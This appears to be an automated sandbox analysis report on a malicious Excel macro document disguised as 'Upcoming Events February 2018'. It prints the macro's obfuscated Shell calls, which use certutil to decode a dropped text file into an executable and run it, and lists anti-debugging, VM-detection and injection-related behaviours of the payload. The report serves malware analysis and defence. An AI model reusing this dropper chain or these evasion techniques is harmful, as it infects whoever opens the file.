Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: jbxstatic_Auto_Open_1548 = JbxLog("function:Auto_Open")

Document contains an embedded VBA macro which may execute processes

Show sources

Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Shell (expath)
Source: VBA code instrumentation	OLE, VBA macro: Module LinesOfBusiness, Function cutil, API Shell("certutil -decode C:\Programdata\M8N5M9S4.txt C:\Programdata\M4P9S1S3.exe")	Name: cutil
Source: VBA code instrumentation	OLE, VBA macro: Module LinesOfBusiness, Function cutil, API Shell("C:\Programdata\M4P9S1S3.exe")	Name: cutil
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Private Function JbxHook_Shell_1_(jbxline, ByRef jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Static jbxtresh_Shell As Integer
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_Shell < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":Shell"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_Shell < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: jbxtresh_Shell = jbxtresh_Shell + 1
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Shell_1_
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxHook_Shell_1_ 58, (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxHook_Shell_1_ 61, (expath)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\343_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Private Function JbxHook_Shell_1_(jbxline, ByRef jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Static jbxtresh_Shell As Integer
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_Shell < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":Shell"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_Shell < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: jbxtresh_Shell = jbxtresh_Shell + 1
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Shell_1_
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxHook_Shell_1_ 58, (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxHook_Shell_1_ 61, (expath)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\343_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
Source: Upcoming Events February 2018.xls	OLE, VBA macro line: Set file = scr.CreateTextFile(path, True)
Source: VBA code instrumentation	OLE, VBA macro: Module LinesOfBusiness, Function cutil, String createobject: Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")	Name: cutil
Source: VBA code instrumentation	OLE, VBA macro: Module LinesOfBusiness, Function cutil, String createobject: Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")	Name: cutil
Source: VBA code instrumentation	OLE, VBA macro: Module LinesOfBusiness, Function cutil, String createtextfile: Set file = scr.CreateTextFile(path, True)	Name: cutil
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxXmlOb = CreateObject("MSXML2.DOMDocument")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Private Function JbxHook_CreateObject_1__set(jbxline, ByRef jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Static jbxtresh_CreateObject As Integer
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateObject < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":CreateObject"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set JbxHook_CreateObject_1__set = CreateObject(jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateObject < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: jbxtresh_CreateObject = jbxtresh_CreateObject + 1
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_CreateObject_1__set
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Private Function JbxHook_CreateTextFile_2__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Static jbxtresh_CreateTextFile As Integer
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateTextFile < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":CreateTextFile"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set JbxHook_CreateTextFile_2__ob_set = jbxthis.CreateTextFile(jbxparam0, jbxparam1)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateTextFile < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: jbxtresh_CreateTextFile = jbxtresh_CreateTextFile + 1
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_CreateTextFile_2__ob_set
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: JbxLog "win32:" & jbxline & ":Sleep" & ":kernel32!Sleep"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set scr = JbxHook_CreateObject_1__set(49, "Scr" & "ipting.FileSy" & "stemObject")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set scr = JbxHook_CreateObject_1__set(53, "Scr" & "ipting.FileSy" & "stemOb" & "ject")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set file = JbxHook_CreateTextFile_2__ob_set(54, scr, path, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\343_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\343_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr	OLE, VBA macro line: Set jbxXmlOb = CreateObject("MSXML2.DOMDocument")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxXmlOb = CreateObject("MSXML2.DOMDocument")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Private Function JbxHook_CreateObject_1__set(jbxline, ByRef jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Static jbxtresh_CreateObject As Integer
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateObject < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":CreateObject"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set JbxHook_CreateObject_1__set = CreateObject(jbxparam0)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateObject < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: jbxtresh_CreateObject = jbxtresh_CreateObject + 1
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_CreateObject_1__set
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Private Function JbxHook_CreateTextFile_2__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Static jbxtresh_CreateTextFile As Integer
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateTextFile < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLog "api:" & jbxline & ":CreateTextFile"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set JbxHook_CreateTextFile_2__ob_set = jbxthis.CreateTextFile(jbxparam0, jbxparam1)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: If jbxtresh_CreateTextFile < 200 Then
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: jbxtresh_CreateTextFile = jbxtresh_CreateTextFile + 1
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_CreateTextFile_2__ob_set
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: JbxLog "win32:" & jbxline & ":Sleep" & ":kernel32!Sleep"
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set scr = JbxHook_CreateObject_1__set(49, "Scr" & "ipting.FileSy" & "stemObject")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set scr = JbxHook_CreateObject_1__set(53, "Scr" & "ipting.FileSy" & "stemOb" & "ject")
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set file = JbxHook_CreateTextFile_2__ob_set(54, scr, path, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\343_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\343_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True)
Source: Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr	OLE, VBA macro line: Set jbxXmlOb = CreateObject("MSXML2.DOMDocument")

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: rundll32.exe	Binary or memory string: Progman
Source: rundll32.exe	Binary or memory string: Program Manager
Source: rundll32.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,lstrcmpiW,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, explorer.exe

4_2_00241C3D

Contains functionality to simulate keystroke presses

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_100037EA GetModuleHandleA,LoadLibraryA,GetProcAddress,keybd_event,

5_2_100037EA

Anti Debugging:

Contains functionality to register its own exception handler

Show sources

Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_00243282 SetUnhandledExceptionFilter,	4_2_00243282
Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_00247753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00247753
Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_00243552 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00243552
Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_002430ED IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_002430ED

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\rundll32.exe

System information queried: KernelDebuggerInformation

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00247753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00247753

Contains functionality to dynamically determine API calls

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_002413F7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,

4_2_002413F7

Contains functionality to read the PEB

Show sources

Source: C:\ProgramData\M4P9S1S3.exe	Code function: 4_2_00246623 mov eax, dword ptr fs:[00000030h]	4_2_00246623
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_10002476 mov eax, dword ptr fs:[00000030h]	5_2_10002476
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_100022AF mov eax, dword ptr fs:[00000030h]	5_2_100022AF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00241E47 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_00241E47

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_0024986D FindFirstFileExA,

4_2_0024986D

Contains functionality to query system information

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_10004383 GetVersionExA,GetSystemInfo,GetSystemMetrics,GetSystemMetrics,

5_2_10004383

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: EXCEL.EXE, Upcoming%20Events%20February%202018((Autosaved-306506912719538464)).xls.1.dr, Upcoming%20Events%20February%202018((Autosaved-306506912832108464)).xls.1.dr

Binary or memory string: ywQCEnFFHGPXZOS4TSiujjIHP1hc8MzZlJQaX92wG8/pjK/x1KTDQ8/El7oaUzvhD0Qv8qKQU0pw7ERvAbj/DQnnptKhEWupUizfgLQUG2IyjH/XHQ8MGaRor2IJupRx8PmYcjrkyXQBBFUiKeA4XBYsg7c6pVP+ujxYgjJ4XeVJLE7X6alWl2FkHyk7IS7C0GcWQiy7fU6y1+/MpRErdeySpCLgp4O2Qc06kmgItBuQNrdgFOPS+/AWywB9KAtECHSZIVWQS/L0dl851D+blPBJH96N7nOv0nHbCh1Vpvqph8fy5OBKs2EPdOrZj/82mGwLyUC4pnS1i3BoF4yeEbyoB5lbkAu15Ga6BWyo/jVhJNBAgzt+puHflxmKcPtOzx2mtwV267VBsKkS7fva4SZ7308FklsVmRNPKALNY0aLAwfRXl3T1eU031F4FOSLGWQZk+f8Lw5XFKzTxLMhw6kh5HdTFHzyNOwzp/yJdV45Zw8pDthE7tT0ruFN84DGHzTeECEJ4aIi4C6Y9ilqS8XPk04lFrn2EVdrytbe1bGW9k6z+PeDd26//2quiLdhKahfbAQG5sYxRE+6JG/0+ClcV7qhYCPMKu9fVtrh2nqG2kcX5Xkkp1iv7zBKMAslKfsn1iQh5/9BoDx+L5C5+mYZm8oVVrakNfSYvNVMC+SetKG81cFjaQlCX5uNOtqbro7MArEyKKPRUeYJ1SUryLC+I7PpIQG2zYx/5syJMNUxid1nk7nRUBftDgI4mQp+y/0C8xxS1JMr2SUbB8WZ396NFp2QDKq/VGLbgJPYLu/pPjGa0r8C9g/7St7FAPpZLG6L44QvZt7ZDc9vKLlZn4jbnhCjqRzWO2RKkSEjHjKyGVdKc7tClViEvcrUFqIAbTXpOnUp1brIAm/zo9Cvdg9somIm1o2b+fZHqj0xXKU3mUWtFZxsPqR9nnv4+dpq8nITBmATeGY1QMdqHt3jCiyU5ff+4cLzAuKrui7u686ZMynhhU6gRoh0yuZL4kCjw

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\rundll32.exe

Process information queried: ProcessInformation

Checks the free space of harddrives

Show sources

Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE

File Volume queried: C:\Windows\System32 FullSizeInformation

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\rundll32.exe

Window / User API: threadDelayed 921

Found evasive API chain checking for process token information

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-10109

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\rundll32.exe TID: 3476	Thread sleep count: 921 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3476	Thread sleep time: -55260000s >= -60000s
Source: C:\Windows\System32\rundll32.exe TID: 3444	Thread sleep time: -5400000s >= -60000s
Source: C:\Windows\System32\rundll32.exe TID: 3444	Thread sleep count: 43 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3444	Thread sleep count: 38 > 30
Source: C:\Windows\System32\rundll32.exe TID: 3444	Thread sleep count: 40 > 30

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\M4P9S1S3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\M4P9S1S3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\M4P9S1S3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
